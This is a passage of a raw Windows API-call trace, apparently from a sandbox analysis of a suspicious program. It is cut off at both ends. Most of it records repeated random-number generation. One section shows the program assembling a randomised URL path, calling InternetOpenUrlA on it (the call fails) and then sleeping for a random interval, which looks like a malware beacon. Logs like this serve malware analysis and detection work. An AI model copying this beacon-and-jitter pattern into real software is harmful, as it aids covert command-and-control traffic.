pbBuffer=0x46ffd5f) returned 0x0 [0199.991] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.991] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0199.991] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01dd4, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a01dd4) returned 0x0 [0199.991] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.991] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.991] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.992] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.992] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.992] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.992] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.992] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.992] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.992] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.992] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.992] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.992] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.992] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.993] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.993] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.993] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.993] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.993] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.994] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.994] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.994] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.994] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.994] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.995] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.995] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.995] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.995] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.996] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.996] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.996] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.996] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0199.996] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01df8, cbBuffer=0x1f, dwFlags=0x2 | out: pbBuffer=0x3a01df8) returned 0x0 [0199.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0199.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0199.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0199.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.001] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.001] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.001] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0200.001] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.002] GetProcessHeap () returned 0x440000 [0200.002] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0200.002] lstrcpyA (in: lpString1=0x473770, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0200.002] lstrcatA (in: lpString1="\x81\x03", lpString2="/uasBppgt9RKcnvrqe04xtub0oee0om8gu6p3r/zuk9ixNdq7huyvz07dKPveRgrOpRcbi2qqpk449a2m6fyv/3MyTSVugpiwBajiZxvObmFktjzEpcj41o7Z6pc5aPmlft/c2xhIjr5uaoytjv9bkOonU0xnns5iq0fmra/lXrU8gq6kEhqc1c4mjc7csrjccoVnk/" | out: lpString1="\x81\x03/uasBppgt9RKcnvrqe04xtub0oee0om8gu6p3r/zuk9ixNdq7huyvz07dKPveRgrOpRcbi2qqpk449a2m6fyv/3MyTSVugpiwBajiZxvObmFktjzEpcj41o7Z6pc5aPmlft/c2xhIjr5uaoytjv9bkOonU0xnns5iq0fmra/lXrU8gq6kEhqc1c4mjc7csrjccoVnk/") returned="\x81\x03/uasBppgt9RKcnvrqe04xtub0oee0om8gu6p3r/zuk9ixNdq7huyvz07dKPveRgrOpRcbi2qqpk449a2m6fyv/3MyTSVugpiwBajiZxvObmFktjzEpcj41o7Z6pc5aPmlft/c2xhIjr5uaoytjv9bkOonU0xnns5iq0fmra/lXrU8gq6kEhqc1c4mjc7csrjccoVnk/" [0200.002] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0200.002] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/uasBppgt9RKcnvrqe04xtub0oee0om8gu6p3r/zuk9ixNdq7huyvz07dKPveRgrOpRcbi2qqpk449a2m6fyv/3MyTSVugpiwBajiZxvObmFktjzEpcj41o7Z6pc5aPmlft/c2xhIjr5uaoytjv9bkOonU0xnns5iq0fmra/lXrU8gq6kEhqc1c4mjc7csrjccoVnk/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0200.002] GetProcessHeap () returned 0x440000 [0200.002] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0200.002] GetProcessHeap () returned 0x440000 [0200.002] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a01d50 | out: hHeap=0x440000) returned 1 [0200.003] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0200.003] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0200.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0200.004] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0200.004] Sleep (dwMilliseconds=0xff89) [0200.279] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0200.279] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0200.279] GetProcessHeap () returned 0x440000 [0200.280] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02850 [0200.280] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0200.280] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02851, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x3a02851) returned 0x0 [0200.280] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.281] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.281] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.281] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.281] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.282] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.282] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.282] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0200.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0200.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0200.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, 